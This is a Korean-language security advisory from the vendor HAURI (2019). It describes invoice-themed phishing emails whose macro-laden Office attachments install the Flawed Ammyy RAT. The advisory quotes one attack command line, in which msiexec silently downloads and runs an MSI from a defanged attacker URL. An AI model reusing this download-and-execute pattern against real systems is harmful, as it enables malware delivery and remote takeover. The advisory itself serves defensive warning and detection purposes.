HAURI

전체메뉴 열기

Security issues analysis

주의해야 할 보안위협요소에 대한 분석자료 제공

보안이슈 분석

(주의) 송장 및 인보이스로 위장한 악성 메일 주의
등록일 :
2019.02.19

□ 개요

최근 국내에 송장 및 인보이스로 위장한 악성 메일이 지속적으로 유포되고 있어 국내 사용자들의 각별한 주의가 요구된다.

 

□ 내용

해당 메일에는 송장 또는 인보이스 관련 이름을 가진 .doc 파일 또는 .xls 파일이 첨부되어 있다.




[그림 1] 송장 및 인보이스로 위장한 악성 메일

 

메일에 첨부된 문서 파일을 실행하게 되면콘텐츠 사용버튼을 클릭하라는 내용이 담겨있다. 사용자가콘텐츠 사용버튼을 누르게 유도함으로써 문서 파일 내부에 존재하는 매크로 실행을 통해 악성코드를 감염시킨다.

 

 


[그림 2] 악성 매크로가 삽입된 문서 파일

 

사용자가 콘텐츠 사용’ 버튼을 클릭하게 되면 내부에서 매크로가 실행됨으로써 msiexec.exe를 통해 악성 MSI 파일을 다운로드하고 실행하게 된다.

msiexec.exe val=conn rdp=pu,,,ic /i hxxp://update365office.com/agp /q OnLoad='c:\windows\notepad.exe’

 

실행된 MSI 파일을 통해 인코딩 된 추가 악성코드를 다운로드하게 된다. 다운로드 된 악성코드를 디코딩 과정을 거쳐 실행하게 되고 최종적으로 Flawed Ammyy RAT 악성코드를 실행한다. Flawed Ammyy RAT 악성코드를 통해 백신 설치 여부 검사, PC 정보 탈취, 원격 제어를 수행한다.

 

 

  

[그림 3] 백신 탐지 루틴 

 

 

따라서, 최근 다양한 악성메일을 통해 감염을 시도하고 있으므로 첨부파일이 포함된 메일의 경우 의심부터 하고 메일의 진위여부를 주의 깊게 확인해야 한다.

□ 바이로봇 업데이트 내역

Trojan.Win32.Downloader

MSI.Agent

BIN.Agent

Backdoor.Win32.Agent​ 

 

 

  • - 본 정보의 저작권은 (주)하우리에 있으므로 허가없이 전체 또는 일부를 사용 시 저작권 침해로 간주될 수 있습니다.
  • - 상업적인 목적이나 단체에서 사용할 경우, 별도로 허가를 받으셔야 합니다. (정보 이용 문의 skim@hauri.co.kr)

Top